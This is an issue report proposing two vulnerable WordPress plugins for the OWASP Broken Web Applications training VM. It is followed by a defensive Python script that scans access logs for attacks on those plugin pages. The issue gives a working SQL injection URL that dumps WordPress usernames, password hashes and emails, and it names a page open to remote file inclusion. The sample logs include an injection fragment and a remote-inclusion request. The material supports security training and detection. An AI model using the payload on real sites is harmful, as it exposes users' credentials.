To spice things up a bit, I added two plugins to WordPress (mygallery,
spreadsheet). Also made a post on the front page about it. Most people are
running at least one plug-in, so I thought this gave a more 'real world'
perspective. Also, both plug-ins suffer from vulnerabilities.
http://www.exploit-db.com/exploits/3814/
http://www.exploit-db.com/exploits/5486/
exploit:
http://owaspbwa/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--
the RFI will take some more work, but the vulnerable page is:
http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php
You can remove the .zip plugin files from /var/www/wordpress/wp-content/plugins
to save some space.
If this gets added, let me know and I'll update vuln_list.html!
Original issue reported on code.google.com by MichaelTCyr@gmail.com on 20 Apr 2011 at 4:04
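
Added example, not part of the original issue or of the OWASP BWA project: a small access-log check for the two plugin pages named above, useful for confirming that a training run against the VM shows up in the web server logs. The log lines are constructed, and `placeholder_param` is a hypothetical parameter name, since the issue does not name the one involved in the RFI.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Paths taken from the issue text above.
SQLI_PATH = "/wordpress/wp-content/plugins/wpSS/ss_load.php"
RFI_PATH = ("/wordpress/wp-content/plugins/mygallery/"
            "myfunctions/mygallerybrowser.php")

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.I)

def classify(log_line):
    """Return a finding string for a suspicious request, or None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # parse_qsl decodes '+' and %xx, so encoded payloads are compared decoded.
    params = parse_qsl(url.query, keep_blank_values=True)
    if url.path == SQLI_PATH:
        for name, value in params:
            # ss_id is expected to be a plain integer id; anything else is flagged.
            if name == "ss_id" and not re.fullmatch(r"[0-9]+", value):
                return "wpSS: non-numeric ss_id"
    if url.path == RFI_PATH:
        for name, value in params:
            # Any parameter carrying a remote URL is flagged, whatever its name.
            if REMOTE_RE.match(value):
                return f"mygallery: remote URL in parameter {name!r}"
    return None

def scan(lines):
    """Return (line_number, finding) pairs for every flagged line."""
    return [(i, f) for i, line in enumerate(lines, 1) if (f := classify(line))]

# Constructed sample log lines (Apache common log format, documentation IPs).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Apr/2011:16:04:00 +0000] "GET /wordpress/wp-content/'
    'plugins/wpSS/ss_load.php?ss_id=1 HTTP/1.1" 200 512',
    '192.0.2.11 - - [20/Apr/2011:16:04:05 +0000] "GET /wordpress/wp-content/'
    'plugins/wpSS/ss_load.php?ss_id=1+and+(1=0) HTTP/1.1" 200 734',
    '192.0.2.12 - - [20/Apr/2011:16:04:09 +0000] "GET /wordpress/wp-content/'
    'plugins/mygallery/myfunctions/mygallerybrowser.php'
    '?placeholder_param=http://example.invalid/x.txt HTTP/1.1" 200 120',
    '192.0.2.13 - - [20/Apr/2011:16:04:12 +0000] "GET /wordpress/ HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for line_no, finding in scan(SAMPLE_LOG):
        print(line_no, finding)
```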